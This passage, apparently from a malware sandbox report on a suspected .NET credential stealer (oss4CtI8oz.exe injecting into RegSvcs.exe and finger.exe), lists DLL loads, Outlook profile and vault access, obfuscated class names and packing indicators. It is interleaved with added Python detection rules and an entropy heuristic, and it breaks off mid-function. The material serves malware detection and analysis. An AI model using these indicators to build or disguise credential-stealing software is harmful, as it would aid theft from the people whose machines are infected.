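def run_triage(events=EVENTS, loads=LOADS):
    """Return per-event rule hits (in input order) and the image-load findings."""
    return [triage_process(e) for e in events], triage_loads(loads)


if __name__ == "__main__":
    hits, cred_loads = run_triage()
    for ev, h in zip(EVENTS, hits):
        print(f"{basename(ev.image):16} <- {basename(ev.parent):20} {h}")
    print(cred_loads)
```

The control event (finger.exe launched from cmd.exe with a target) stays quiet, and the firefox.exe load of winsqlite3.dll is excluded, so the rules fire only on the relationships the report shows. In production the parent-path rule should also cover other user-writable roots (ProgramData, Temp, AppData), and the exclusion rule should feed on the script-block log (event 4104) as well as 4688/Sysmon 1, since a long -EncodedCommand can be truncated in process-creation telemetry.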
Source: C:\Users\user\Desktop\oss4CtI8oz.exe Section loaded (in load order): mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll (x2), uxtheme.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, riched20.dll, usp10.dll, msls31.dll, dwrite.dll, windowscodecs.dll, amsi.dll, userenv.dll, msasn1.dll, gpapi.dll, textshaping.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll, ntmarta.dll, wintypes.dll (x3), propsys.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, sspicli.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded (in load order): atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll (x2), cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, msasn1.dll, amsi.dll, userenv.dll, profapi.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, propsys.dll, wininet.dll, microsoft.management.infrastructure.native.unmanaged.dll, mi.dll, miutils.dll, wmidcom.dll, dpapi.dll, wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded (in load order): fastprox.dll, ncobjapi.dll, wbemcomn.dll (x2), kernel.appcore.dll, mpclient.dll, userenv.dll, version.dll, msasn1.dll, wmitomi.dll, mi.dll, miutils.dll (x2), gpapi.dll
Source: C:\Windows\SysWOW64\finger.exe Section loaded (in load order): mswsock.dll, wininet.dll, kernel.appcore.dll, uxtheme.dll, ieframe.dll, iertutil.dll, netapi32.dll, version.dll, userenv.dll, winhttp.dll, wkscli.dll, netutils.dll, sspicli.dll, windows.storage.dll, wldp.dll, profapi.dll, secur32.dll, mlang.dll, propsys.dll, winsqlite3.dll, vaultcli.dll, wintypes.dll
Source: C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\DzuG1v7KGGzqI4w.exe Section loaded (in load order): wininet.dll, mswsock.dll, dnsapi.dll, iphlpapi.dll, fwpuclnt.dll, rasadhlp.dll
Source: C:\Windows\System32\svchost.exe Section loaded (in load order): kernel.appcore.dll, qmgr.dll, bitsperf.dll, powrprof.dll, xmllite.dll, firewallapi.dll, esent.dll, umpdc.dll, dnsapi.dll, iphlpapi.dll, fwbase.dll, wldp.dll, ntmarta.dll, profapi.dll, flightsettings.dll, policymanager.dll, msvcp110_win.dll, netprofm.dll, npmproxy.dll, bitsigd.dll, upnp.dll, winhttp.dll, ssdpapi.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, appxdeploymentclient.dll, cryptbase.dll, wsmauto.dll, miutils.dll, wsmsvc.dll, dsrole.dll, pcwum.dll, mi.dll, userenv.dll, gpapi.dll, winhttp.dll, wkscli.dll, netutils.dll, sspicli.dll, ondemandconnroutehelper.dll, msv1_0.dll, ntlmshared.dll, cryptdll.dll, webio.dll, mswsock.dll, winnsi.dll, rasadhlp.dll, fwpuclnt.dll, rmclient.dll, usermgrcli.dll, execmodelclient.dll, propsys.dll, coremessaging.dll, twinapi.appcore.dll, onecorecommonproxystub.dll, execmodelproxy.dll, resourcepolicyclient.dll, vssapi.dll, vsstrace.dll, samcli.dll, samlib.dll, es.dll, bitsproxy.dll, ondemandconnroutehelper.dll, dhcpcsvc6.dll, dhcpcsvc.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, ncrypt.dll, ncryptsslp.dll, msasn1.dll, cryptsp.dll, rsaenh.dll, dpapi.dll, mpr.dll
Source: C:\Users\user\Desktop\oss4CtI8oz.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\oss4CtI8oz.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Windows\SysWOW64\finger.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: oss4CtI8oz.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: oss4CtI8oz.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: oss4CtI8oz.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: finger.pdb source: RegSvcs.exe, 00000004.00000002.1067580563.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp, DzuG1v7KGGzqI4w.exe, 00000006.00000002.3338837385.000000000105E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000004.00000002.1068183881.0000000001320000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000007.00000002.3340212039.0000000003150000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000007.00000003.1067736968.0000000002DF0000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000007.00000003.1076390461.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000007.00000002.3340212039.00000000032EE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000004.00000002.1068183881.0000000001320000.00000040.00001000.00020000.00000000.sdmp, finger.exe, finger.exe, 00000007.00000002.3340212039.0000000003150000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000007.00000003.1067736968.0000000002DF0000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000007.00000003.1076390461.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000007.00000002.3340212039.00000000032EE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: LouH.pdb source: oss4CtI8oz.exe
                Source: Binary string: LouH.pdbSHA256HB source: oss4CtI8oz.exe
                Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: DzuG1v7KGGzqI4w.exe, 00000006.00000000.992635700.00000000001EF000.00000002.00000001.01000000.0000000B.sdmp, DzuG1v7KGGzqI4w.exe, 00000009.00000000.1144229567.00000000001EF000.00000002.00000001.01000000.0000000B.sdmp
                Source: Binary string: finger.pdbGCTL source: RegSvcs.exe, 00000004.00000002.1067580563.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp, DzuG1v7KGGzqI4w.exe, 00000006.00000002.3338837385.000000000105E000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

Source: oss4CtI8oz.exe, Form3.cs .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: 0.2.oss4CtI8oz.exe.7190000.4.raw.unpack, .cs .Net Code: System.Reflection.Assembly.Load(byte[])
Source: 0.2.oss4CtI8oz.exe.2e1a118.0.raw.unpack, .cs .Net Code: System.Reflection.Assembly.Load(byte[])
Source: 0.2.oss4CtI8oz.exe.7340000.5.raw.unpack, tnGIQe7bESBeOGbg8N.cs .Net Code: OLq1LroSAm System.Reflection.Assembly.Load(byte[])
Source: 0.2.oss4CtI8oz.exe.4021a88.3.raw.unpack, tnGIQe7bESBeOGbg8N.cs .Net Code: OLq1LroSAm System.Reflection.Assembly.Load(byte[])
Source: oss4CtI8oz.exe Static PE information: 0xCDFF8560 [Sat Jul 8 20:51:44 2079 UTC]
Source: C:\Users\user\Desktop\oss4CtI8oz.exe Code function: 0_2_072CE4AA pushad ; retf 0_2_072CE4B1
Source: C:\Users\user\Desktop\oss4CtI8oz.exe Code function: 0_2_07307F90 pushad ; iretd 0_2_07307F91
Source: C:\Users\user\Desktop\oss4CtI8oz.exe Code function: 0_2_073079B2 push eax; retf 0_2_073079B9
Source: C:\Users\user\Desktop\oss4CtI8oz.exe Code function: 0_2_07C12EAD push FFFFFF8Bh; iretd 0_2_07C12EAF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_004014F0 push FFFFFF89h; retn D8D9h 4_2_00401A97
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_004014F0 push ebx; retn F2A0h 4_2_00401B60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0042D963 push edi; iretd 4_2_0042D96C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_00407109 push cs; iretd 4_2_0040710B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_004149E2 push edi; retf 4_2_004149E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_00406365 push ebx; ret 4_2_00406366
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_00403370 push eax; ret 4_2_00403372
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_00417E8E push ebx; iretd 4_2_00417E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_00414F55 push 00000079h; retf 4_2_00414F57
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0040D75B push ss; ret 4_2_0040D760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0041870B pushad ; retf 4_2_0041870C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0041AF95 push esi; iretd 4_2_0041AF97
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0132225F pushad ; ret 4_2_013227F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_013227FA pushad ; ret 4_2_013227F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_013509AD push ecx; mov dword ptr [esp], ecx 4_2_013509B6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0132283D push eax; iretd 4_2_01322858
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_01329939 push es; iretd 4_2_01329940
Source: C:\Windows\SysWOW64\finger.exe Code function: 7_2_031809AD push ecx; mov dword ptr [esp], ecx 7_2_031809B6
Source: C:\Windows\SysWOW64\finger.exe Code function: 7_2_00865398 pushad ; retf 7_2_00865399
Source: C:\Windows\SysWOW64\finger.exe Code function: 7_2_0087A5F0 push edi; iretd 7_2_0087A5F9
Source: C:\Windows\SysWOW64\finger.exe Code function: 7_2_0086C766 push cs; retf 7_2_0086C77D
Source: C:\Windows\SysWOW64\finger.exe Code function: 7_2_0085D970 push esp; retf 7_2_0085D9B9
Source: C:\Windows\SysWOW64\finger.exe Code function: 7_2_00861BE2 push 00000079h; retf 7_2_00861BE4
Source: C:\Windows\SysWOW64\finger.exe Code function: 7_2_00864B1B push ebx; iretd 7_2_00864B1D
Source: C:\Windows\SysWOW64\finger.exe Code function: 7_2_00867C22 push esi; iretd 7_2_00867C24
Source: C:\Windows\SysWOW64\finger.exe Code function: 7_2_00853D96 push cs; iretd 7_2_00853D98
Source: C:\Windows\SysWOW64\finger.exe Code function: 7_2_00852FF2 push ebx; ret 7_2_00852FF3
                Source: oss4CtI8oz.exe Static PE information: section name: .text entropy: 7.800864931150451
                Source: 0.2.oss4CtI8oz.exe.7340000.5.raw.unpack, suHcoIe9AHX695RwfE.cs High entropy of concatenated method names: 'xuT8yOYelr', 'sRk8c7sLgE', 'dBe8uZmdxB', 'cXFupK4ZEL', 'Vq7uzOHnJo', 'pva8YhfYOe', 'QaJ82Jl2KW', 'qUC8JwpMgY', 'Qqf8gLAcoF', 'Hxu81yKUtp'
                Source: 0.2.oss4CtI8oz.exe.7340000.5.raw.unpack, bc2a3e31wbBrI9NhD4.cs High entropy of concatenated method names: 'jLaZm1q7IY', 'pySZVJDJIh', 'uf7ZnqGMsY', 'I9pZaRMuW1', 'AcwZj3AtGT', 'fxlZtXxljg', 'yJ7ZsR7jlv', 'WylZduQe9P', 'JY6ZGLOvtc', 'ckXZpVneOW'
                Source: 0.2.oss4CtI8oz.exe.7340000.5.raw.unpack, Wt66Mj4FbmE7Dp00QI.cs High entropy of concatenated method names: 'ojHcNckI8H', 'CEWcQ79cnh', 'zVhc3ZTwUN', 'FOfc4w5J72', 'TJ4c09b37N', 'zIcck0pv4k', 'iPVcDqxu1r', 'BWEc64T2Sd', 'r4KcwfhAIp', 'B7CcAXyeoE'
                Source: 0.2.oss4CtI8oz.exe.7340000.5.raw.unpack, ssZg3f21GuR9AI0O0Kg.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'B6jKwFDdbw', 'FgrKAsx6hu', 'mejKBE3XuQ', 'syaKKw42og', 'qYoKfYoRCt', 'HEOKrmydBO', 'zb9KlX11r3'
                Source: 0.2.oss4CtI8oz.exe.7340000.5.raw.unpack, XKf49ytqdC6ZOywZBi.cs High entropy of concatenated method names: 'iTkDd13xam', 'zYtDpk5GyE', 'IwH6YOPsZL', 'bIs62YCDI3', 'tMGDRvQIZv', 'NAHDvr4y8p', 'reVDHodevn', 'jR0DmLG35R', 'g6jDVf5qFy', 'rbQDnYWMEK'
                Source: 0.2.oss4CtI8oz.exe.7340000.5.raw.unpack, tYe48cmWj55j9fqa2v.cs High entropy of concatenated method names: 'Yuh0EghXIx', 'yuU0vOfeXx', 'ttG0m9uCNk', 'Rc40VVbJEV', 'scM0UNFY2V', 'Wyl0IqpSed', 'cya0ikBL4H', 'DGP0qxMHlS', 'D7a0WjYwp5', 'tU40eDOs6C'
                Source: 0.2.oss4CtI8oz.exe.7340000.5.raw.unpack, N6moQ09V21hKtm2FOi.cs High entropy of concatenated method names: 'YJL8CIipVS', 'EEH8TDXK7M', 'hXl8L11Jy0', 'Rsn8NysYOl', 'flC85ig5yq', 'WZy8QBYXSu', 'kyn8hMkMuS', 'vML83gRero', 'a6A84oIOeV', 'jU28XQhHIR'
                Source: 0.2.oss4CtI8oz.exe.7340000.5.raw.unpack, s6jvvAGqCQkQvvVeAk.cs High entropy of concatenated method names: 'A04wF2nBkW', 'QRuwUiC0Lj', 'LmUwI7TdlP', 'ykJwik7jxS', 'xRpwqgYCVG', 'A8FwWHo6qf', 'r40weeP5a8', 'RGYwxrcyOB', 'QxOw919dN0', 'H6YwEdTA2U'
                Source: 0.2.oss4CtI8oz.exe.7340000.5.raw.unpack, wl98LCsZR78D1C4pXC.cs High entropy of concatenated method names: 'Bcbw0Q77Yj', 'quFwDBMOVk', 'cpIwwtIg13', 'WPjwBam4WA', 'rQowfv6wWL', 'QbJwlLl7oD', 'Dispose', 'zbL6yXjmWX', 'gQE6ZLDVsP', 'gx16chfMVR'
                Source: 0.2.oss4CtI8oz.exe.7340000.5.raw.unpack, AG4FgIXalSV6kxD9D8.cs High entropy of concatenated method names: 'i9kP5RuTKL', 'h5BPhhCHXX', 'mEgcIjZLfV', 'WYjci8CMvo', 'y0WcqGJm9x', 'NNqcWXmQkj', 'dHncenlBW5', 'NtbcxbpCEM', 'dULc9B8wGS', 'vJGcE93iNI'
                Source: 0.2.oss4CtI8oz.exe.7340000.5.raw.unpack, QW4UaspMJGf4pcPukm.cs High entropy of concatenated method names: 'y6uAcZAV2V', 'CRgAPM2NtU', 'br3AuaN4l7', 'zNaA8g9SUv', 'LtqAwSVXvS', 'KbTA7xpfgf', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.oss4CtI8oz.exe.7340000.5.raw.unpack, kKWyTLaF8tg1ZQL1xL.cs High entropy of concatenated method names: 'U5oDSeH3CK', 'zVwDMMpp63', 'ToString', 'BdrDyMQmH5', 'J9hDZHiMuP', 'jynDcJBU7J', 'kVaDPCA3mc', 'P25DuAQEj0', 'RL4D8X0PvF', 'ohwD7oYqek'
                Source: 0.2.oss4CtI8oz.exe.7340000.5.raw.unpack, i2hsklJY6IyNQgRa7x.cs High entropy of concatenated method names: 'Sb4LMJxoH', 'Xn5NgGI10', 'dcGQmxdgR', 'uwIhGFI6d', 'B8h486ng5', 'dTOXcEOi1', 'ksvrxeSn8AC1hwN3gA', 'cNawAC6WckT042eZ1Q', 'F5t61w49p', 'C4uARocJF'
                Source: 0.2.oss4CtI8oz.exe.7340000.5.raw.unpack, DVWMN122K9HgamZKnYm.cs High entropy of concatenated method names: 'HWaApp0ULQ', 'S5sAzg8nTS', 'IWmBYs9MYi', 'YnfB2NYcOI', 'X84BJYKkH4', 'VnoBg7MsxQ', 'IoKB1XP1mf', 'KgmBoNlXNy', 'Fd2ByIK10O', 'kAMBZgRkVc'
                Source: 0.2.oss4CtI8oz.exe.7340000.5.raw.unpack, ljUsmBZRQBngCLjlpC.cs High entropy of concatenated method names: 'Dispose', 'k8D2G1C4pX', 'DjFJUdk7Qu', 'e7KZoVihVs', 'y902pH1xWd', 'Sha2zQXDDi', 'ProcessDialogKey', 'JSAJY6jvvA', 'JCQJ2kQvvV', 'LAkJJmW4Ua'
                Source: 0.2.oss4CtI8oz.exe.7340000.5.raw.unpack, H0WVtHzaf6su4HWMce.cs High entropy of concatenated method names: 'SwdAQokhrv', 'bapA3NdKmt', 'sFgA4mmC75', 'sd2AFSZgMU', 'PECAUwQlnc', 'YyvAinnPTD', 'j6lAqcBtMg', 'qmFAllJdJK', 'igaACI8m5c', 'SICATscLpl'
                Source: 0.2.oss4CtI8oz.exe.7340000.5.raw.unpack, SbLvUp2YNOa8IKA1OaK.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'lanARc2sOq', 'WmHAvHYqdX', 'lAFAHX5nWD', 'xLeAm4GqXk', 'oomAVWcWb2', 'L4LAnwWIwP', 'uICAafbbZr'
                Source: 0.2.oss4CtI8oz.exe.7340000.5.raw.unpack, t7SMjU18Il4xLk0q7w.cs High entropy of concatenated method names: 'woJ28c2a3e', 'dwb27BrI9N', 'UFb2SmE7Dp', 'o0Q2MI5G4F', 'LD920D8nS4', 'HLQ2keq6xJ', 'h9RDLePgSqeTtnBrCg', 'hnuiqfaDL56C8vwxdn', 'hLv22vTSyg', 'x482gGe4LZ'
                Source: 0.2.oss4CtI8oz.exe.7340000.5.raw.unpack, tnGIQe7bESBeOGbg8N.cs High entropy of concatenated method names: 'H3qgoWIpOo', 'KJlgy3K33y', 'oUdgZoN15S', 'cvZgcj35hg', 'WXkgPDKMSC', 'RlPguFH446', 'rmRg8O6XoT', 'VDwg7ItLLp', 'O7WgO1RHO6', 'mUSgSZcxcy'
                Source: 0.2.oss4CtI8oz.exe.7340000.5.raw.unpack, SS4ILQFeq6xJlWCQsV.cs High entropy of concatenated method names: 'CHMuoZwhQS', 'YEhuZbDLEl', 'CCiuPDSbK1', 'DWHu85rssg', 'kM1u7Dxtjs', 'Rk4PjhGXGf', 'PyJPtmc5ld', 'n9ePswrG9V', 'grrPdQx9O5', 'MDJPGXbcgy'
                Source: 0.2.oss4CtI8oz.exe.7340000.5.raw.unpack, kApFyXHlKys05TFri9.cs High entropy of concatenated method names: 'GIIb3IW6yd', 'veKb4gZgxi', 'VAJbF6OfF7', 'MxUbU5beJq', 'R7hbi1JMnc', 'swcbqoHLvd', 'RXObeA4PcJ', 'NZfbx4AjVy', 'IMHbECLH3o', 'QbFbRK7QCI'
                Source: 0.2.oss4CtI8oz.exe.4021a88.3.raw.unpack, suHcoIe9AHX695RwfE.cs High entropy of concatenated method names: 'xuT8yOYelr', 'sRk8c7sLgE', 'dBe8uZmdxB', 'cXFupK4ZEL', 'Vq7uzOHnJo', 'pva8YhfYOe', 'QaJ82Jl2KW', 'qUC8JwpMgY', 'Qqf8gLAcoF', 'Hxu81yKUtp'
                Source: 0.2.oss4CtI8oz.exe.4021a88.3.raw.unpack, bc2a3e31wbBrI9NhD4.cs High entropy of concatenated method names: 'jLaZm1q7IY', 'pySZVJDJIh', 'uf7ZnqGMsY', 'I9pZaRMuW1', 'AcwZj3AtGT', 'fxlZtXxljg', 'yJ7ZsR7jlv', 'WylZduQe9P', 'JY6ZGLOvtc', 'ckXZpVneOW'
                Source: 0.2.oss4CtI8oz.exe.4021a88.3.raw.unpack, Wt66Mj4FbmE7Dp00QI.cs High entropy of concatenated method names: 'ojHcNckI8H', 'CEWcQ79cnh', 'zVhc3ZTwUN', 'FOfc4w5J72', 'TJ4c09b37N', 'zIcck0pv4k', 'iPVcDqxu1r', 'BWEc64T2Sd', 'r4KcwfhAIp', 'B7CcAXyeoE'
                Source: 0.2.oss4CtI8oz.exe.4021a88.3.raw.unpack, ssZg3f21GuR9AI0O0Kg.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'B6jKwFDdbw', 'FgrKAsx6hu', 'mejKBE3XuQ', 'syaKKw42og', 'qYoKfYoRCt', 'HEOKrmydBO', 'zb9KlX11r3'
                Source: 0.2.oss4CtI8oz.exe.4021a88.3.raw.unpack, XKf49ytqdC6ZOywZBi.cs High entropy of concatenated method names: 'iTkDd13xam', 'zYtDpk5GyE', 'IwH6YOPsZL', 'bIs62YCDI3', 'tMGDRvQIZv', 'NAHDvr4y8p', 'reVDHodevn', 'jR0DmLG35R', 'g6jDVf5qFy', 'rbQDnYWMEK'
                Source: 0.2.oss4CtI8oz.exe.4021a88.3.raw.unpack, tYe48cmWj55j9fqa2v.cs High entropy of concatenated method names: 'Yuh0EghXIx', 'yuU0vOfeXx', 'ttG0m9uCNk', 'Rc40VVbJEV', 'scM0UNFY2V', 'Wyl0IqpSed', 'cya0ikBL4H', 'DGP0qxMHlS', 'D7a0WjYwp5', 'tU40eDOs6C'
                Source: 0.2.oss4CtI8oz.exe.4021a88.3.raw.unpack, N6moQ09V21hKtm2FOi.cs High entropy of concatenated method names: 'YJL8CIipVS', 'EEH8TDXK7M', 'hXl8L11Jy0', 'Rsn8NysYOl', 'flC85ig5yq', 'WZy8QBYXSu', 'kyn8hMkMuS', 'vML83gRero', 'a6A84oIOeV', 'jU28XQhHIR'
                Source: 0.2.oss4CtI8oz.exe.4021a88.3.raw.unpack, s6jvvAGqCQkQvvVeAk.cs High entropy of concatenated method names: 'A04wF2nBkW', 'QRuwUiC0Lj', 'LmUwI7TdlP', 'ykJwik7jxS', 'xRpwqgYCVG', 'A8FwWHo6qf', 'r40weeP5a8', 'RGYwxrcyOB', 'QxOw919dN0', 'H6YwEdTA2U'
                Source: 0.2.oss4CtI8oz.exe.4021a88.3.raw.unpack, wl98LCsZR78D1C4pXC.cs High entropy of concatenated method names: 'Bcbw0Q77Yj', 'quFwDBMOVk', 'cpIwwtIg13', 'WPjwBam4WA', 'rQowfv6wWL', 'QbJwlLl7oD', 'Dispose', 'zbL6yXjmWX', 'gQE6ZLDVsP', 'gx16chfMVR'
                Source: 0.2.oss4CtI8oz.exe.4021a88.3.raw.unpack, AG4FgIXalSV6kxD9D8.cs High entropy of concatenated method names: 'i9kP5RuTKL', 'h5BPhhCHXX', 'mEgcIjZLfV', 'WYjci8CMvo', 'y0WcqGJm9x', 'NNqcWXmQkj', 'dHncenlBW5', 'NtbcxbpCEM', 'dULc9B8wGS', 'vJGcE93iNI'
                Source: 0.2.oss4CtI8oz.exe.4021a88.3.raw.unpack, QW4UaspMJGf4pcPukm.cs High entropy of concatenated method names: 'y6uAcZAV2V', 'CRgAPM2NtU', 'br3AuaN4l7', 'zNaA8g9SUv', 'LtqAwSVXvS', 'KbTA7xpfgf', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.oss4CtI8oz.exe.4021a88.3.raw.unpack, kKWyTLaF8tg1ZQL1xL.cs High entropy of concatenated method names: 'U5oDSeH3CK', 'zVwDMMpp63', 'ToString', 'BdrDyMQmH5', 'J9hDZHiMuP', 'jynDcJBU7J', 'kVaDPCA3mc', 'P25DuAQEj0', 'RL4D8X0PvF', 'ohwD7oYqek'
                Source: 0.2.oss4CtI8oz.exe.4021a88.3.raw.unpack, i2hsklJY6IyNQgRa7x.cs High entropy of concatenated method names: 'Sb4LMJxoH', 'Xn5NgGI10', 'dcGQmxdgR', 'uwIhGFI6d', 'B8h486ng5', 'dTOXcEOi1', 'ksvrxeSn8AC1hwN3gA', 'cNawAC6WckT042eZ1Q', 'F5t61w49p', 'C4uARocJF'
                Source: 0.2.oss4CtI8oz.exe.4021a88.3.raw.unpack, DVWMN122K9HgamZKnYm.cs High entropy of concatenated method names: 'HWaApp0ULQ', 'S5sAzg8nTS', 'IWmBYs9MYi', 'YnfB2NYcOI', 'X84BJYKkH4', 'VnoBg7MsxQ', 'IoKB1XP1mf', 'KgmBoNlXNy', 'Fd2ByIK10O', 'kAMBZgRkVc'
                Source: 0.2.oss4CtI8oz.exe.4021a88.3.raw.unpack, ljUsmBZRQBngCLjlpC.cs High entropy of concatenated method names: 'Dispose', 'k8D2G1C4pX', 'DjFJUdk7Qu', 'e7KZoVihVs', 'y902pH1xWd', 'Sha2zQXDDi', 'ProcessDialogKey', 'JSAJY6jvvA', 'JCQJ2kQvvV', 'LAkJJmW4Ua'
                Source: 0.2.oss4CtI8oz.exe.4021a88.3.raw.unpack, H0WVtHzaf6su4HWMce.cs High entropy of concatenated method names: 'SwdAQokhrv', 'bapA3NdKmt', 'sFgA4mmC75', 'sd2AFSZgMU', 'PECAUwQlnc', 'YyvAinnPTD', 'j6lAqcBtMg', 'qmFAllJdJK', 'igaACI8m5c', 'SICATscLpl'
                Source: 0.2.oss4CtI8oz.exe.4021a88.3.raw.unpack, SbLvUp2YNOa8IKA1OaK.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'lanARc2sOq', 'WmHAvHYqdX', 'lAFAHX5nWD', 'xLeAm4GqXk', 'oomAVWcWb2', 'L4LAnwWIwP', 'uICAafbbZr'
                Source: 0.2.oss4CtI8oz.exe.4021a88.3.raw.unpack, t7SMjU18Il4xLk0q7w.cs High entropy of concatenated method names: 'woJ28c2a3e', 'dwb27BrI9N', 'UFb2SmE7Dp', 'o0Q2MI5G4F', 'LD920D8nS4', 'HLQ2keq6xJ', 'h9RDLePgSqeTtnBrCg', 'hnuiqfaDL56C8vwxdn', 'hLv22vTSyg', 'x482gGe4LZ'
                Source: 0.2.oss4CtI8oz.exe.4021a88.3.raw.unpack, tnGIQe7bESBeOGbg8N.cs High entropy of concatenated method names: 'H3qgoWIpOo', 'KJlgy3K33y', 'oUdgZoN15S', 'cvZgcj35hg', 'WXkgPDKMSC', 'RlPguFH446', 'rmRg8O6XoT', 'VDwg7ItLLp', 'O7WgO1RHO6', 'mUSgSZcxcy'
                Source: 0.2.oss4CtI8oz.exe.4021a88.3.raw.unpack, SS4ILQFeq6xJlWCQsV.cs High entropy of concatenated method names: 'CHMuoZwhQS', 'YEhuZbDLEl', 'CCiuPDSbK1', 'DWHu85rssg', 'kM1u7Dxtjs', 'Rk4PjhGXGf', 'PyJPtmc5ld', 'n9ePswrG9V', 'grrPdQx9O5', 'MDJPGXbcgy'
                Source: 0.2.oss4CtI8oz.exe.4021a88.3.raw.unpack, kApFyXHlKys05TFri9.cs High entropy of concatenated method names: 'GIIb3IW6yd', 'veKb4gZgxi', 'VAJbF6OfF7', 'MxUbU5beJq', 'R7hbi1JMnc', 'swcbqoHLvd', 'RXObeA4PcJ', 'NZfbx4AjVy', 'IMHbECLH3o', 'QbFbRK7QCI'
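The "High entropy of concatenated method names" lines above come from a heuristic for obfuscated .NET assemblies: the method names of each class are joined into one string and its Shannon entropy is measured. Renamed identifiers such as 'xuT8yOYelr' spread their characters almost uniformly over upper case, lower case and digits, so the joined string scores far higher than English-like names. The code below is an added example and is not part of the Joe Sandbox report; its class and method names are copied from the report lines above, while the 4.6-bit threshold, the 40-character minimum length and the comparison class "OrdinaryConverter" are assumptions for the illustration (the report does not publish its own cut-off). The class QW4UaspMJGf4pcPukm, which mixes renamed methods with the real 'Next' and 'NextBytes', is included to show how genuine names pull the score down.

```python
"""Flag .NET classes whose concatenated method names look machine-generated.

Added example, not part of the Joe Sandbox report. The class and method
names below are copied from the report; the 4.6-bit threshold, the minimum
length and the 'OrdinaryConverter' comparison class are assumptions.
"""
import math
from collections import Counter
from typing import Dict, List


def shannon_entropy(text: str) -> float:
    """Shannon entropy of `text` in bits per character (0.0 for empty input)."""
    if not text:
        return 0.0
    total = len(text)
    return -sum((c / total) * math.log2(c / total) for c in Counter(text).values())


def name_entropy(method_names: List[str]) -> float:
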